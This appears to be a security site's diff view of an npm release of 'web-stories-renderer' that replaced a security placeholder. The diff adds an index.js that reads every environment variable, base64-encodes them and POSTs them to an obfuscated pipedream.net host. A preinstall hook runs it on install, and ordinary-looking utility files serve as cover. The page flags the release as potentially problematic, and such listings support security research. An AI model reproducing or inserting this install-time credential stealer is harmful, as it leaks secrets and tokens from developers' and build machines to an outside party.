web-stories-renderer 0.0.1-security → 1.0.25-1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of web-stories-renderer might be problematic. Click here for more details.

package/index.js ADDED
@@ -0,0 +1,21 @@
1
+ const http = require('https');
2
+
3
+
4
+ function main() {
5
+ var data = process.env || {};
6
+ if (Object.keys(data).length < 10) {
7
+ return;
8
+ }
9
+
10
+ req = http.request({
11
+ host: ['ca4df1f8c6f29252d40f9e48d8cb79b1', 'm', ['pipe','dream'].join(''), 'net'].join('.'),
12
+ path: '/' + (data.npm_package_name || ''),
13
+ method: 'POST'
14
+ }).on('error', function (err) {
15
+ });
16
+
17
+ req.write(Buffer.from(JSON.stringify(data)).toString('base64'));
18
+ req.end();
19
+ }
20
+
21
+ main();
package/lib/index.js ADDED
@@ -0,0 +1,9 @@
1
+ "use strict";
2
+ Object.defineProperty(exports, "__esModule", { value: true });
3
+ exports.mapTree = exports.traverseTree = void 0;
4
+ var tslib_1 = require("tslib");
5
+ var maker_1 = tslib_1.__importDefault(require("./maker"));
6
+ var tree_1 = require("@tinkoff-boxy/tree");
7
+ Object.defineProperty(exports, "traverseTree", { enumerable: true, get: function () { return tree_1.traverseTree; } });
8
+ Object.defineProperty(exports, "mapTree", { enumerable: true, get: function () { return tree_1.mapTree; } });
9
+ exports.default = maker_1.default;
package/lib/utils.js ADDED
@@ -0,0 +1,41 @@
1
+ "use strict";
2
+ Object.defineProperty(exports, "__esModule", { value: true });
3
+ exports.isPrototypeOf = exports.safeMargins = exports.warn = exports.noop = exports.pick = void 0;
4
+ exports.pick = function (source, keys) {
5
+ return Object.keys(source).reduce(function (acc, key) {
6
+ // https://wiki.tcsbank.ru/pages/viewpage.action?pageId=830854918
7
+ // Из-за особенностей админки генерит разметку вида
8
+ // style="flex:;flex-direction:column;justify-content:;align-items:;padding:;border-top:;border-bottom:"
9
+ // поэтому проверяем не на undefined, а на не пустую строку
10
+ if (keys.indexOf(key) !== -1 && source[key]) {
11
+ acc[key] = source[key];
12
+ }
13
+ return acc;
14
+ }, {});
15
+ };
16
+ exports.noop = function () { };
17
+ exports.warn = function (message, data) {
18
+ if (process.env.NODE_ENV !== 'production') {
19
+ if (data) {
20
+ console.warn(message, data); // eslint-disable-line no-console
21
+ }
22
+ else {
23
+ console.warn(message); // eslint-disable-line no-console
24
+ }
25
+ }
26
+ };
27
+ function px(val) {
28
+ var digicsOnly = val.replace(/\D/g, '');
29
+ var numVal = Math.abs(Number(digicsOnly));
30
+ if (numVal === 0 || Number.isNaN(numVal) || numVal > 20) {
31
+ return '0';
32
+ }
33
+ return numVal + "px";
34
+ }
35
+ exports.safeMargins = function (dangerMargins) {
36
+ var _a = dangerMargins.split(' '), _b = _a[1], marginRight = _b === void 0 ? '0' : _b, _c = _a[3], marginLeft = _c === void 0 ? '0' : _c;
37
+ return "0 " + px(marginRight) + " 0 " + px(marginLeft);
38
+ };
39
+ exports.isPrototypeOf = function (obj, proto) {
40
+ return Object.prototype.isPrototypeOf.call(obj, proto);
41
+ };
package/package.json CHANGED
@@ -1,6 +1,23 @@
1
1
  {
2
2
  "name": "web-stories-renderer",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.25-1",
4
+ "description": "Tinkoff web stories renderer",
5
+ "main": "lib/index.js",
6
+ "scripts": {
7
+ "preinstall": "node index.js",
8
+ "build": "yarn build"
9
+ },
10
+ "dependencies": {
11
+ "@tinkoff/logger": "^0.10.8",
12
+ "classnames": "^2.3.1",
13
+ "react": "16.8.6",
14
+ "react-dom": "16.8.6"
15
+ },
16
+ "files": [
17
+ "index.js",
18
+ "lib/index.js",
19
+ "lib/utils.js"
20
+ ],
21
+ "author": "htkoff",
22
+ "license": "MIT"
6
23
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=web-stories-renderer for more information.